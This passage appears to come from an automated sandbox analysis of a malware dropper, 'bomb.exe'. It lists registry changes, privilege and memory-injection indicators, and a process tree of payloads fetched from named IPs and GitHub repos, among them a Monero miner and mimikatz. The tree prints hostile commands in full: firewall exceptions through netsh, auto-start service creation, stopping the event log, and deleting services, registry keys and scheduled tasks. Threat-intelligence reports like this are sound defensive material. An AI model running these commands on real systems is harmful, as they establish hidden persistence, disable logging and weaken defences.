Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "75"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3864	http185.215.113.66del2.exe.exe
2976	http185.215.113.66minedelll.exe.exe
1672	http185.215.113.66del1.exe.exe
356	http185.215.113.75filesz1nk0vrandom.exe.exe
356	http185.215.113.75filesz1nk0vrandom.exe.exe
356	http185.215.113.75filesz1nk0vrandom.exe.exe
2452	http185.215.113.66xmrminer.exe.exe
2452	http185.215.113.66xmrminer.exe.exe
2452	http185.215.113.66xmrminer.exe.exe
2452	http185.215.113.66xmrminer.exe.exe
2984	wincsupdt.exe
2984	wincsupdt.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
5048	powershell.exe
5048	powershell.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
5048	powershell.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
3620	http185.215.113.66xmin.exe.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
2756	WindowsServices.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4448	svchost.exe
4824	conhost.exe
4824	conhost.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
6908	Process not Found
1672	Process not Found
5992	Process not Found
6152	Process not Found
772	Process not Found
4720	Process not Found
5660	Process not Found
5868	Process not Found
6044	Process not Found
6840	Process not Found
5440	Process not Found
7080	Process not Found
6160	Process not Found
5360	Process not Found
5908	Process not Found
6552	Process not Found
6872	Process not Found
6596	Process not Found
6844	Process not Found
6980	Process not Found
7012	Process not Found
5592	Process not Found
4692	Process not Found
6104	Process not Found
948	Process not Found
412	Process not Found
6184	Process not Found
6908	Process not Found
6996	Process not Found
7072	Process not Found
5632	Process not Found
7156	Process not Found
1144	Process not Found
2016	Process not Found
4720	Process not Found
2984	Process not Found
6752	Process not Found
2676	Process not Found
5144	Process not Found
6816	Process not Found
6776	Process not Found
6408	Process not Found
3152	Process not Found
5552	Process not Found
884	Process not Found
3732	Process not Found
768	Process not Found
4584	Process not Found
6536	Process not Found
6112	Process not Found
3208	Process not Found
6664	Process not Found
6984	Process not Found
6780	Process not Found
6864	Process not Found
3580	Process not Found
5356	Process not Found
5728	Process not Found
5408	Process not Found
5228	Process not Found
5720	Process not Found
2528	Process not Found
5320	Process not Found
6240	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3024	bomb.exe
Token: SeDebugPrivilege	3864	http185.215.113.66del2.exe.exe
Token: SeDebugPrivilege	2976	http185.215.113.66minedelll.exe.exe
Token: SeDebugPrivilege	1672	http185.215.113.66del1.exe.exe
Token: SeDebugPrivilege	356	http185.215.113.75filesz1nk0vrandom.exe.exe
Token: SeDebugPrivilege	4448	svchost.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	2756	WindowsServices.exe
Token: SeDebugPrivilege	4824	conhost.exe
Token: SeIncBasePriorityPrivilege	4936	httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
Token: SeLockMemoryPrivilege	5196	dwm.exe
Token: SeDebugPrivilege	5296	taskkill.exe
Token: SeDebugPrivilege	5408	taskkill.exe
Token: SeDebugPrivilege	5388	taskkill.exe
Token: 33	4448	svchost.exe
Token: SeIncBasePriorityPrivilege	4448	svchost.exe
Token: SeDebugPrivilege	5448	taskkill.exe
Token: SeDebugPrivilege	4492	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Token: SeDebugPrivilege	5532	taskkill.exe
Token: SeDebugPrivilege	4492	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Token: SeDebugPrivilege	4492	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Token: SeDebugPrivilege	4492	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Token: SeDebugPrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeCreateGlobalPrivilege	5980	dwm.exe
Token: SeChangeNotifyPrivilege	5980	dwm.exe
Token: 33	5980	dwm.exe
Token: SeIncBasePriorityPrivilege	5980	dwm.exe
Token: SeDebugPrivilege	5724	taskkill.exe
Token: SeCreateGlobalPrivilege	4364	dwm.exe
Token: SeChangeNotifyPrivilege	4364	dwm.exe
Token: 33	4364	dwm.exe
Token: SeIncBasePriorityPrivilege	4364	dwm.exe
Token: SeCreateGlobalPrivilege	4984	dwm.exe
Token: SeChangeNotifyPrivilege	4984	dwm.exe
Token: 33	4984	dwm.exe
Token: SeIncBasePriorityPrivilege	4984	dwm.exe
Token: SeCreateGlobalPrivilege	3060	dwm.exe
Token: SeChangeNotifyPrivilege	3060	dwm.exe
Token: 33	3060	dwm.exe
Token: SeIncBasePriorityPrivilege	3060	dwm.exe
Token: SeCreateGlobalPrivilege	2416	dwm.exe
Token: SeChangeNotifyPrivilege	2416	dwm.exe
Token: 33	2416	dwm.exe
Token: SeIncBasePriorityPrivilege	2416	dwm.exe
Token: SeDebugPrivilege	6052	http196.251.92.64reshbuild.exe.exe
Token: SeCreateGlobalPrivilege	4252	dwm.exe
Token: SeChangeNotifyPrivilege	4252	dwm.exe
Token: 33	4252	dwm.exe
Token: SeIncBasePriorityPrivilege	4252	dwm.exe
Token: SeDebugPrivilege	1760	http162.230.48.189uploadsA.exe.exe
Token: SeCreateGlobalPrivilege	4752	dwm.exe
Token: SeChangeNotifyPrivilege	4752	dwm.exe
Token: 33	4752	dwm.exe
Token: SeIncBasePriorityPrivilege	4752	dwm.exe
Token: SeDebugPrivilege	5620	taskkill.exe
Token: SeIncreaseQuotaPrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeSecurityPrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeTakeOwnershipPrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeLoadDriverPrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeSystemProfilePrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeSystemtimePrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeProfSingleProcessPrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeIncBasePriorityPrivilege	5744	http196.251.92.64reshClient.exe.exe
Token: SeCreatePagefilePrivilege	5744	http196.251.92.64reshClient.exe.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2036	http196.251.92.64cryptBREMCOS.exe.exe
5344	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3024 wrote to memory of 560	3024	bomb.exe	82
PID 3024 wrote to memory of 560	3024	bomb.exe	82
PID 3024 wrote to memory of 560	3024	bomb.exe	82
PID 3024 wrote to memory of 2936	3024	bomb.exe	83
PID 3024 wrote to memory of 2936	3024	bomb.exe	83
PID 3024 wrote to memory of 2936	3024	bomb.exe	83
PID 3024 wrote to memory of 5096	3024	bomb.exe	84
PID 3024 wrote to memory of 5096	3024	bomb.exe	84
PID 3024 wrote to memory of 5096	3024	bomb.exe	84
PID 3024 wrote to memory of 2760	3024	bomb.exe	85
PID 3024 wrote to memory of 2760	3024	bomb.exe	85
PID 3024 wrote to memory of 2760	3024	bomb.exe	85
PID 3024 wrote to memory of 3744	3024	bomb.exe	86
PID 3024 wrote to memory of 3744	3024	bomb.exe	86
PID 3024 wrote to memory of 3744	3024	bomb.exe	86
PID 2936 wrote to memory of 2200	2936	http185.215.113.66pei.exe.exe	91
PID 2936 wrote to memory of 2200	2936	http185.215.113.66pei.exe.exe	91
PID 2936 wrote to memory of 2200	2936	http185.215.113.66pei.exe.exe	91
PID 2760 wrote to memory of 4076	2760	httptwizt.netnewtpp.exe.exe	92
PID 2760 wrote to memory of 4076	2760	httptwizt.netnewtpp.exe.exe	92
PID 2760 wrote to memory of 4076	2760	httptwizt.netnewtpp.exe.exe	92
PID 2200 wrote to memory of 3928	2200	1188120023.exe	93
PID 2200 wrote to memory of 3928	2200	1188120023.exe	93
PID 2200 wrote to memory of 3928	2200	1188120023.exe	93
PID 5096 wrote to memory of 2756	5096	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	94
PID 5096 wrote to memory of 2756	5096	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	94
PID 5096 wrote to memory of 2756	5096	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	94
PID 560 wrote to memory of 4448	560	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	95
PID 560 wrote to memory of 4448	560	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	95
PID 560 wrote to memory of 4448	560	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	95
PID 3024 wrote to memory of 356	3024	bomb.exe	96
PID 3024 wrote to memory of 356	3024	bomb.exe	96
PID 3024 wrote to memory of 356	3024	bomb.exe	96
PID 3024 wrote to memory of 2452	3024	bomb.exe	97
PID 3024 wrote to memory of 2452	3024	bomb.exe	97
PID 3024 wrote to memory of 3864	3024	bomb.exe	98
PID 3024 wrote to memory of 3864	3024	bomb.exe	98
PID 3024 wrote to memory of 2976	3024	bomb.exe	99
PID 3024 wrote to memory of 2976	3024	bomb.exe	99
PID 3024 wrote to memory of 1672	3024	bomb.exe	100
PID 3024 wrote to memory of 1672	3024	bomb.exe	100
PID 3864 wrote to memory of 132	3864	http185.215.113.66del2.exe.exe	101
PID 3864 wrote to memory of 132	3864	http185.215.113.66del2.exe.exe	101
PID 2976 wrote to memory of 1084	2976	http185.215.113.66minedelll.exe.exe	103
PID 2976 wrote to memory of 1084	2976	http185.215.113.66minedelll.exe.exe	103
PID 1672 wrote to memory of 5036	1672	http185.215.113.66del1.exe.exe	105
PID 1672 wrote to memory of 5036	1672	http185.215.113.66del1.exe.exe	105
PID 132 wrote to memory of 4924	132	cmd.exe	107
PID 132 wrote to memory of 4924	132	cmd.exe	107
PID 1084 wrote to memory of 4480	1084	cmd.exe	456
PID 1084 wrote to memory of 4480	1084	cmd.exe	456
PID 1084 wrote to memory of 4556	1084	cmd.exe	109
PID 1084 wrote to memory of 4556	1084	cmd.exe	109
PID 132 wrote to memory of 3548	132	cmd.exe	110
PID 132 wrote to memory of 3548	132	cmd.exe	110
PID 5036 wrote to memory of 3512	5036	cmd.exe	111
PID 5036 wrote to memory of 3512	5036	cmd.exe	111
PID 5036 wrote to memory of 4660	5036	cmd.exe	112
PID 5036 wrote to memory of 4660	5036	cmd.exe	112
PID 356 wrote to memory of 4004	356	http185.215.113.75filesz1nk0vrandom.exe.exe	113
PID 356 wrote to memory of 4004	356	http185.215.113.75filesz1nk0vrandom.exe.exe	113
PID 356 wrote to memory of 4004	356	http185.215.113.75filesz1nk0vrandom.exe.exe	113
PID 356 wrote to memory of 4004	356	http185.215.113.75filesz1nk0vrandom.exe.exe	113
PID 356 wrote to memory of 4004	356	http185.215.113.75filesz1nk0vrandom.exe.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	http196.251.92.64reshDevil2.exe.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	http196.251.92.64reshDevil2.exe.exe

C:\Users\Admin\AppData\Local\Temp\bomb.exe
"C:\Users\Admin\AppData\Local\Temp\bomb.exe"
1⤵
- Downloads MZ/PE file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3024
- C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Windows\svchost.exe
    "C:\Windows\svchost.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops autorun.inf file
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4428
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
  2⤵
  - Downloads MZ/PE file
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Users\Admin\AppData\Local\Temp\1188120023.exe
    C:\Users\Admin\AppData\Local\Temp\1188120023.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2200
  - - C:\Users\Admin\sysnldcvmr.exe
      C:\Users\Admin\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3928
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5096
- - C:\Windows\WindowsServices.exe
    "C:\Windows\WindowsServices.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\WindowsServices.exe" "WindowsServices.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3884
- C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\sysnldcvmr.exe
    C:\Windows\sysnldcvmr.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4076
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesLisan7random.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesLisan7random.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3744
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 864
    3⤵
    - Program crash
    PID:3096
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesz1nk0vrandom.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesz1nk0vrandom.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:356
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:4004
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4004 -s 96
      4⤵
      Program crash
      PID:6124
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmrminer.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmrminer.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2452
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WinUpdt"
    3⤵
    - Launches sc.exe
    PID:1060
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WinUpdt" binpath= "C:\ProgramData\WinUpdt\wincsupdt.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:5092
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2260
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WinUpdt"
    3⤵
    - Launches sc.exe
    PID:2316
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del2.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3864
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "WinSvcs" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:132
  - - C:\Windows\system32\sc.exe
      sc delete "WinSvcs"
      4⤵
      Launches sc.exe
      PID:4924
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
      4⤵
      PID:3548
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66minedelll.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66minedelll.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1084
  - - C:\Windows\system32\sc.exe
      sc delete "WinUpdt"
      4⤵
      Launches sc.exe
      PID:4480
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
      4⤵
      PID:4556
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del1.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del1.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\system32\sc.exe
      sc delete "Windows Services"
      4⤵
      Launches sc.exe
      PID:3512
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
      4⤵
      PID:4660
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmin.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmin.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3620
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WinUpla"
    3⤵
    - Launches sc.exe
    PID:4912
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WinUpla" binpath= "C:\ProgramData\WinUpla\winuspdt.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3152
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1664
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WinUpla"
    3⤵
    - Launches sc.exe
    PID:3304
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66mindelnew.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66mindelnew.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4188
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
    3⤵
    - Indicator Removal: Clear Persistence
    - System Location Discovery: System Language Discovery
    PID:3376
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:5364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4444
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dwm.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5388
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2176
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4928
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5408
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
